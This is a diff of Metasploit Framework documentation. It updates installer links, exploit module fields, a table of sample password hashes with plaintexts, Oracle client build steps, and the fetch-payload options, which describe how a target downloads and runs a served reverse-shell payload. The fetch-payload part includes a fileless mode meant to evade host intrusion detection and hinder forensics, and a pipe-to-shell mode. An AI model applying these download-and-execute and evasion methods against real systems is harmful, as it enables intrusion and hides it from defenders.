-| [metasploit-4.19.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.0-2021031701-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.0-2021031701-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.0-2021031701-windows-x64-installer.exe.asc)|
-| [metasploit-4.19.0-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.0-2021031701-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.0-2021031701-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.0-2021031701-linux-x64-installer.run.asc)|
-| [metasploit-4.18.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.18.0-2020101201-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.18.0-2020101201-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.18.0-2020101201-windows-x64-installer.exe.asc)|
-| [metasploit-4.18.0-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.18.0-2020101201-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.18.0-2020101201-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.18.0-2020101201-linux-x64-installer.run.asc)|
-| [metasploit-4.17.1-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.17.1-2020080301-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.17.1-2020080301-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.17.1-2020080301-windows-x64-installer.exe.asc)|
-| [metasploit-4.17.1-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.17.1-2020080301-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.17.1-2020080301-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.17.1-2020080301-linux-x64-installer.run.asc)|
+| Download Link                                                                                                                                                |File Type| SHA                                                                                                                       | PGP                                                                                                                      |
+|--------------------------------------------------------------------------------------------------------------------------------------------------------------|-|---------------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------|
+| [metasploit-4.22.7-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe)                    | Windows 64-bit | [SHA256](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.sha256)               | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.asc)                    |
+| [metasploit-4.22.7-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run)                          | Windows 64-bit | [SHA256](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.sha256)                 | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.asc)                      |
+| [metasploit-4.22.6-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.6-2024111901-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.6-2024111901-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.6-2024111901-windows-x64-installer.exe.asc) |
+| [metasploit-4.22.6-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.6-2024111901-linux-x64-installer.run)     | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.6-2024111901-linux-x64-installer.run.sha1)  | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.6-2024111901-linux-x64-installer.run.asc)   |
+| [metasploit-4.22.5-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.5-2024111401-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.5-2024111401-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.5-2024111401-windows-x64-installer.exe.asc) |
+| [metasploit-4.22.5-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.5-2024111401-linux-x64-installer.run)     | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.5-2024111401-linux-x64-installer.run.sha1)  | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.5-2024111401-linux-x64-installer.run.asc)   |
+| [metasploit-4.22.4-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.4-2024101401-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.4-2024101401-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.4-2024101401-windows-x64-installer.exe.asc) |
+| [metasploit-4.22.4-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.4-2024101401-linux-x64-installer.run)     | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.4-2024101401-linux-x64-installer.run.sha1)  | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.4-2024101401-linux-x64-installer.run.asc)   |
+| [metasploit-4.22.3-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.3-2024082201-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.3-2024082201-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.3-2024082201-windows-x64-installer.exe.asc) |
+| [metasploit-4.22.3-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.3-2024082201-linux-x64-installer.run)     | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.3-2024082201-linux-x64-installer.run.sha1)  | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.3-2024082201-linux-x64-installer.run.asc)   |
+| [metasploit-4.22.2-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.2-2024072501-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.2-2024072501-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.2-2024072501-windows-x64-installer.exe.asc) |
+| [metasploit-4.22.2-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.2-2024072501-linux-x64-installer.run)     | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.2-2024072501-linux-x64-installer.run.sha1)  | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.2-2024072501-linux-x64-installer.run.asc)   |
+| [metasploit-4.22.1-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-windows-x64-installer.exe.asc) |
+| [metasploit-4.22.1-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-linux-x64-installer.run)     | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-linux-x64-installer.run.sha1)  | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-linux-x64-installer.run.asc)   |
+| [metasploit-4.22.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-windows-x64-installer.exe.asc) |
+| [metasploit-4.22.0-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-linux-x64-installer.run)     | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-linux-x64-installer.run.sha1)  | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-linux-x64-installer.run.asc)   |
+| [metasploit-4.21.1-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-windows-x64-installer.exe.asc) |
+| [metasploit-4.21.1-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-linux-x64-installer.run)     | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-linux-x64-installer.run.sha1)  | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-linux-x64-installer.run.asc)   |
+| [metasploit-4.21.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-windows-x64-installer.exe.asc) |
+| [metasploit-4.21.0-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-linux-x64-installer.run)     | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-linux-x64-installer.run.sha1)  | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-linux-x64-installer.run.asc)   |
+| [metasploit-4.20.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-windows-x64-installer.exe.asc) |
+| [metasploit-4.20.0-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-linux-x64-installer.run)     | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-linux-x64-installer.run.sha1)  | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-linux-x64-installer.run.asc)   |
+| [metasploit-4.19.1-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.1-2021073101-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.1-2021073101-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.1-2021073101-windows-x64-installer.exe.asc) |
+| [metasploit-4.19.1-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.1-2021073101-linux-x64-installer.run)     | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.1-2021073101-linux-x64-installer.run.sha1)  | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.1-2021073101-linux-x64-installer.run.asc)   |
+| [metasploit-4.19.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.0-2021031701-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.0-2021031701-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.0-2021031701-windows-x64-installer.exe.asc) |
+| [metasploit-4.19.0-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.0-2021031701-linux-x64-installer.run)     | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.0-2021031701-linux-x64-installer.run.sha1)  | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.0-2021031701-linux-x64-installer.run.asc)   |
+| [metasploit-4.18.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.18.0-2020101201-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.18.0-2020101201-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.18.0-2020101201-windows-x64-installer.exe.asc) |
+| [metasploit-4.18.0-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.18.0-2020101201-linux-x64-installer.run)     | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.18.0-2020101201-linux-x64-installer.run.sha1)  | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.18.0-2020101201-linux-x64-installer.run.asc)   |
+| [metasploit-4.17.1-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.17.1-2020080301-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.17.1-2020080301-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.17.1-2020080301-windows-x64-installer.exe.asc) |
+| [metasploit-4.17.1-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.17.1-2020080301-linux-x64-installer.run)     | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.17.1-2020080301-linux-x64-installer.run.sha1)  | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.17.1-2020080301-linux-x64-installer.run.asc)   |


 ## Metasploit Framework Source
@@ -112,6 +112,11 @@ end
    * **Reliability** - The Reliability field describes how reliable the session is that gets returned by the exploit, ex: `REPEATABLE_SESSION`, `UNRELIABLE_SESSION`
    * **SideEffects** - The SideEffects field describes the side effects cause by the exploit that the user should be aware of, ex: `ARTIFACTS_ON_DISK`, `IOC_IN_LOGS`, `ACCOUNT_LOCKOUTS`.

+### Non-required fields
+
+* **Stance** - The types of stances an exploit can take, such as passive or aggressive. Stances indicate whether or not the module triggers the exploit without waiting for one or more conditions to be met (aggressive) or whether it must wait for certain conditions to be satisfied before the exploit can be initiated (passive). Passive exploits usually would wait for interaction from a client or other entity for being able to trigger the vulnerability.
+
+* **Passive** - Either `true` or `false` indicates whether or not the exploit should be run as a background job. If for example you know the vulnerability takes an hour to trigger, setting `Passive` to `true` would be beneficial as it allows the user to continue using msfconsole while waiting for a response from the exploit.

 Your exploit should also have a `check` method to support the check command, but this is optional in case it's not possible.

@@ -201,7 +201,7 @@ This data breaks down to the following table:
 | MSCash2                              | mscash2-hashcat    | `$DCC2$10240#tom#e4e938d12fe5974dc42a90120bd9c90f`                                                                                                                                                                                                                     | hashcat      | mscash2              |                                                  | auxiliary/analyze/crack_windows                           |
 | MSSQL (2005)                         | mssql05_toto       | `0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908`                                                                                                                                                                                                               | toto         | mssql05              | auxiliary/scanner/mssql/mssql_hashdump           | auxiliary/analyze/crack_databases                         |
 | MSSQL                                | mssql_foo          | `0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254`                                                                                                                                                                       | foo          | mssql                | auxiliary/scanner/mssql/mssql_hashdump           | auxiliary/analyze/crack_databases                         |
-| MSSQL (2012)                         | mssql12_Password1! | `0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16`                                                                                                                       | Password!    | mssql12              | auxiliary/scanner/mssql/mssql_hashdump           | auxiliary/analyze/crack_databases                         |
+| MSSQL (2012)                         | mssql12_Password1! | `0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16`                                                                                                                       | Password1!    | mssql12              | auxiliary/scanner/mssql/mssql_hashdump           | auxiliary/analyze/crack_databases                         |
 | MySQL                                | mysql_probe        | `445ff82636a7ba59`                                                                                                                                                                                                                                                     | probe        | mysql                | auxiliary/scanner/mysql/mysql_hashdump           | auxiliary/analyze/crack_databases                         |
 | MySQL SHA1                           | mysql-sha1_tere    | `*5AD8F88516BD021DD43F171E2C785C69F8E54ADB`                                                                                                                                                                                                                            | tere         | mysql-sha1           | auxiliary/scanner/mysql/mysql_hashdump           | auxiliary/analyze/crack_databases                         |
 | Oracle                               | simon              | `4F8BC1809CB2AF77`                                                                                                                                                                                                                                                     | A            | des,oracle           | auxiliary/scanner/oracle/oracle_hashdump         | auxiliary/analyze/crack_databases                         |
@@ -18,7 +18,7 @@ Metasploit's DNS configuration is controlled by the `dns` command which has mult

 The current configuration can be printed by running `dns print`:

-```msf6
+```msf
 msf6 > dns print
 Default search domain: N/A
 Default search list:   lab.lan
@@ -23,34 +23,27 @@ msf5 auxiliary(scanner/oracle/oracle_hashdump) > run
 The general steps to getting Oracle support working are to install the Oracle Instant Client and development libraries, install the required dependencies for Kali Linux, then install the gem.

 ## Install the Oracle Instant Client
-As root, create the directory `/opt/oracle`. Then download the [Oracle Instant Client](http://www.oracle.com/technetwork/database/features/instant-client/index-097480.html) packages for your version of Kali Linux. The packages you will need are:
+As root, create the directory `/opt/oracle`. Then download the [Oracle Instant Client](https://www.oracle.com/database/technologies/instant-client/downloads.html) packages for your version of Kali Linux. The packages you will need are:

-* instantclient-basic-linux-12.2.0.1.0.zip
-* instantclient-sqlplus-linux-12.2.0.1.0.zip
-* instantclient-sdk-linux-12.2.0.1.0.zip
+* [instantclient-basic-linux.x64-23.6.0.24.10.zip](https://download.oracle.com/otn_software/linux/instantclient/2360000/instantclient-basic-linux.x64-23.6.0.24.10.zip)
+* [instantclient-sqlplus-linux.x64-23.6.0.24.10.zip](https://download.oracle.com/otn_software/linux/instantclient/2360000/instantclient-sqlplus-linux.x64-23.6.0.24.10.zip)
+* [instantclient-sdk-linux.x64-23.6.0.24.10.zip](https://download.oracle.com/otn_software/linux/instantclient/2360000/instantclient-sdk-linux.x64-23.6.0.24.10.zip)

-Unzip these under `/opt/oracle`, and you should now have a path called `/opt/oracle/instantclient_12_2/`. Next symlink the shared library that we need to access the library from oracle:
-
-```
-root@kali:/opt/oracle/instantclient_12_2# ln libclntsh.so.12.1 libclntsh.so
-
-root@kali:/opt/oracle/instantclient_12_2# ls -lh libclntsh.so
-lrwxrwxrwx 1 root root 17 Jun  1 15:41 libclntsh.so -> libclntsh.so.12.1
-```
+Unzip these under `/opt/oracle`, and you should now have a path called `/opt/oracle/instantclient_23_6/`.

 You also need to configure the appropriate environment variables, perhaps by inserting them into your .bashrc file, logging out and back in for them to apply.

 ```
-export PATH=$PATH:/opt/oracle/instantclient_12_2
-export SQLPATH=/opt/oracle/instantclient_12_2
-export TNS_ADMIN=/opt/oracle/instantclient_12_2
-export LD_LIBRARY_PATH=/opt/oracle/instantclient_12_2
-export ORACLE_HOME=/opt/oracle/instantclient_12_2
+export PATH=$PATH:/opt/oracle/instantclient_23_6
+export SQLPATH=/opt/oracle/instantclient_23_6
+export TNS_ADMIN=/opt/oracle/instantclient_23_6
+export LD_LIBRARY_PATH=/opt/oracle/instantclient_23_6
+export ORACLE_HOME=/opt/oracle/instantclient_23_6
 ```

 If you have succeeded, you should be able to run `sqlplus` from a command prompt:
 ```
-root@kali:/opt/oracle/instantclient_12_2# sqlplus
+root@kali:/opt/oracle/instantclient_23_6# sqlplus

 SQL*Plus: Release 12.2.0.1.0 Production on Tue Mar 26 20:40:24 2019

@@ -64,40 +57,40 @@ Enter user-name:
 First, download and extract the gem source release:

 ```
-root@kali:~# wget https://github.com/kubo/ruby-oci8/archive/ruby-oci8-2.2.7.zip
--2019-03-26 20:31:11--  https://github.com/kubo/ruby-oci8/archive/ruby-oci8-2.2.7.zip
+root@kali:~# wget https://github.com/kubo/ruby-oci8/archive/refs/tags/ruby-oci8-2.2.14.zip
+--2019-03-26 20:31:11--  https://github.com/kubo/ruby-oci8/archive/refs/tags/ruby-oci8-2.2.14.zip
 Resolving github.com (github.com)... 192.30.253.113, 192.30.253.112
 Connecting to github.com (github.com)|192.30.253.113|:443... connected.
 HTTP request sent, awaiting response... 302 Found
-Location: https://codeload.github.com/kubo/ruby-oci8/zip/ruby-oci8-2.2.7 [following]
--2019-03-26 20:31:11--  https://codeload.github.com/kubo/ruby-oci8/zip/ruby-oci8-2.2.7
+Location: https://codeload.github.com/kubo/ruby-oci8/zip/ruby-oci8-2.2.14 [following]
+--2019-03-26 20:31:11--  https://codeload.github.com/kubo/ruby-oci8/zip/ruby-oci8-2.2.14
 Resolving codeload.github.com (codeload.github.com)... 192.30.253.120, 192.30.253.121
 Connecting to codeload.github.com (codeload.github.com)|192.30.253.120|:443... connected.
 HTTP request sent, awaiting response... 200 OK
 Length: unspecified [application/zip]
-Saving to: 'ruby-oci8-2.2.7.zip'
+Saving to: 'ruby-oci8-2.2.14.zip'

-ruby-oci8-2.2.7.zip                     [ <=>                                                                ] 376.97K  2.36MB/s    in 0.2s    
+ruby-oci8-2.2.14.zip                     [ <=>                                                                ] 376.97K  2.36MB/s    in 0.2s    

-2019-03-26 20:31:11 (2.36 MB/s) - 'ruby-oci8-2.2.7.zip' saved [386016]
+2019-03-26 20:31:11 (2.36 MB/s) - 'ruby-oci8-2.2.14.zip' saved [386016]

-root@kali:~# unzip ruby-oci8-2.2.7.zip 
-Archive:  ruby-oci8-2.2.7.zip
+root@kali:~# unzip ruby-oci8-2.2.14.zip 
+Archive:  ruby-oci8-2.2.14.zip
 0c85bf6da2f541de3236267b1a1b18f0136a8f5a
-   creating: ruby-oci8-ruby-oci8-2.2.7/
-  inflating: ruby-oci8-ruby-oci8-2.2.7/.gitignore  
-  inflating: ruby-oci8-ruby-oci8-2.2.7/.travis.yml 
+   creating: ruby-oci8-ruby-oci8-2.2.14/
+  inflating: ruby-oci8-ruby-oci8-2.2.14/.gitignore  
+  inflating: ruby-oci8-ruby-oci8-2.2.14/.travis.yml 
 [...]
-  inflating: ruby-oci8-ruby-oci8-2.2.7/test/test_rowid.rb
-root@kali:~# cd ruby-oci8-ruby-oci8-2.2.7/
+  inflating: ruby-oci8-ruby-oci8-2.2.14/test/test_rowid.rb
+root@kali:~# cd ruby-oci8-ruby-oci8-2.2.14/
 ```

 Install libgmp (needed to build the gem) and set the path to prefer the correct version of ruby so that Metasploit can use it.

 ```
-root@kali:~/ruby-oci8-ruby-oci8-2.2.7# export PATH=/opt/metasploit/ruby/bin:$PATH
+root@kali:~/ruby-oci8-ruby-oci8-2.2.14# export PATH=/opt/metasploit/ruby/bin:$PATH

-root@kali:~/ruby-oci8-ruby-oci8-2.2.7# apt-get install libgmp-dev
+root@kali:~/ruby-oci8-ruby-oci8-2.2.14# apt-get install libgmp-dev
 Reading package lists... Done
 Building dependency tree
 Reading state information... Done
@@ -117,7 +110,7 @@ Setting up libgmp-dev:amd64 (2:5.0.5+dfsg-2) ...
 Build and install the gem

 ```
-root@kali:~/ruby-oci8-ruby-oci8-2.2.7# make
+root@kali:~/ruby-oci8-ruby-oci8-2.2.14# make
 ruby -w setup.rb config
 setup.rb:280: warning: assigned but unused variable - vname
 setup.rb:280: warning: assigned but unused variable - desc
@@ -130,12 +123,12 @@ setup.rb:280: warning: assigned but unused variable - default2
 <--- lib
 ---> ext
 ---> ext/oci8
-/opt/metasploit/ruby/bin/ruby /root/ruby-oci8-ruby-oci8-2.2.7/ext/oci8/extconf.rb
+/opt/metasploit/ruby/bin/ruby /root/ruby-oci8-ruby-oci8-2.2.14/ext/oci8/extconf.rb
 checking for load library path...
  LD_LIBRARY_PATH...
    checking /opt/metasploit/ruby/lib... no
-    checking /opt/oracle/instantclient_12_2... yes
-  /opt/oracle/instantclient_12_2/libclntsh.so.12.1 looks like an instant client.
+    checking /opt/oracle/instantclient_23_6... yes
+  /opt/oracle/instantclient_23_6/libclntsh.so.12.1 looks like an instant client.
 checking for cc... ok
 checking for gcc... yes
 checking for LP64... yes
@@ -144,11 +137,11 @@ checking for ruby header... ok
 checking for OCIInitialize() in oci.h... yes
 [...]
 linking shared-object oci8lib_250.so
-make[1]: Leaving directory `/root/ruby-oci8-ruby-oci8-2.2.7/ext/oci8'
+make[1]: Leaving directory `/root/ruby-oci8-ruby-oci8-2.2.14/ext/oci8'
 <--- ext/oci8
 <--- ext

-root@kali:~/ruby-oci8-ruby-oci8-2.2.7# make install
+root@kali:~/ruby-oci8-ruby-oci8-2.2.14# make install
 ruby -w setup.rb install
 setup.rb:280: warning: assigned but unused variable - vname
 setup.rb:280: warning: assigned but unused variable - desc
@@ -158,5 +151,5 @@ mkdir -p /opt/metasploit/ruby/lib/ruby/site_ruby/2.5.0/
 install oci8.rb /opt/metasploit/ruby/lib/ruby/site_ruby/2.5.0/
 [...]
 <--- ext
-root@kali:~/ruby-oci8-ruby-oci8-2.2.7#
+root@kali:~/ruby-oci8-ruby-oci8-2.2.14#
 ```
@@ -86,8 +86,7 @@ OptSomething.new(option_name, [boolean, description, value, *enums*], aliases: *
  options](#Filtering-datastore-options) section for more information.
 * **fallbacks** *optional*, *key-word only* An array of names that will be used as a fallback if the main option name is
  defined by the user. This is useful in the scenario of wanting specialised option names such as `SMBUser`, but to also
-  support gracefully checking a list of more generic fallbacks option names such as `Username`. This functionality is 
-  currently behind a feature flag, set with `features set datastore_fallbacks true` in msfconsole
+  support gracefully checking a list of more generic fallbacks option names such as `Username`.

 Now let's talk about what classes are available:

@@ -24,7 +24,7 @@ cURL, or Certutil.

 ## Organization
 Unlike Command Stagers which are organized by binary, Fetch Payloads are organized by server. Currently, we support
-HTTP, HTTPS, and TFTP servers.  Once you select a fetch payload, you can select the binary you'd like to run on the
+HTTP, HTTPS, SMB, and TFTP servers.  Once you select a fetch payload, you can select the binary you'd like to run on the
 remote host to download the served payload prior to execution.

 Here is the naming convention for fetch payloads:
@@ -69,15 +69,36 @@ msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) >
 `FETCH_COMMAND` is the binary we wish to run on the remote host to download the adapted payload.  Currently, the
 supported options are `CURL FTP TFTP TNFTP WGET` on Linux hosts and `CURL TFTP CERTUTIL` on Windows hosts.  We'll get
 into more details on the binaries later.
-`FETCH_FILENAME` is the name you'd like the executable payload saved as on the remote host.  This option is not
-supported by every binary and must end in `.exe` on Windows hosts.  The default value is random.
+
 `FETCH_SRVHOST` is the IP where the server will listen.
+
 `FETCH_SRVPORT` is the port where the server will listen.
+
 `FETCH_URIPATH` is the URI corresponding to the payload file.  The default value is deterministic based on the
 underlying payload so a payload created in msfvenom will match a listener started in Framework assuming the underlying
 served payload is the same.
+
+### Dependent Options
+`FETCH_FILELESS` is an option that specifies a method to modify the fetch command to download the binary payload to
+memory rather than disk before execution, thus avoiding some HIDS and making forensics harder.  Currently, there are
+two options: `bash` and `python3.8+`.  Both of these require the target to be running Linux Kernel 3.17 or above.
+This option is only available when the platform is Linux.
+
+`FETCH_FILENAME` is the name you'd like the executable payload saved as on the remote host.  This option is not
+supported by every binary and must end in `.exe` on Windows hosts.  The default value is random.
+This option is only available when `FETCH_FILELESS` is set to `none`
+
+`FETCH_PIPE` is a binary flag that will create a second resource containing the original fetch command to run and then
+will produce a much shorter command to run on the host that will download the original fetch command and pipe it
+directly to the target's shell.  Use this option if there is a limit on the command size as it will result in a much
+smaller original command.  When set to true, the `FETCH_URIPATH` option is used for the pipe command resource uri and
+the default `FETCH_URIPATH`value is used for the original binary payload uri.
+This option is only available when the fetch  transport is HTTP or HTTPS and the payload platform is Linux with the 
+`FETCH_COMMAND` set to `CURL` or `WGET` or the platform is Windows and the `FETCH_COMMAND` is `CURL`
+
 `FETCH_WRITABLE_DIR` is the directory on the remote host where we'd like to store the served payload prior to execution.
-This value is not supported by all binaries.  If you set this value and it is not supported, it will generate an error.
+This value is not supported by all fetch binaries.  If you set this value and it is not supported, it will generate an error.
+This option is only available when `FETCH_FILELESS` is set to `none`

 The remaining options will be the options available to you in the served payload; in this case our served payload is
 `linux/x64/meterpreter/reverse_tcp` so our only added options are `LHOST` and `LPORT`.  If we had selected a different
@@ -154,6 +175,20 @@ really odd situation where you can execute commands, you can get a session in fr
 a payload manually.  Just follow the steps above, and run the provided command.  Right now, the only thing we serve are
 Framework payloads, but in the future, expanding to serve and execute any executable binary would be relatively trivial.

+## Fetch Pipe
+If space is at a premium, you can use the `FETCH_PIPE` option.  When using `FETCH_PIPE`, the fetch server hosts two
+resources: the original binary and then the generated fetch command.  In the place of the original command, the command
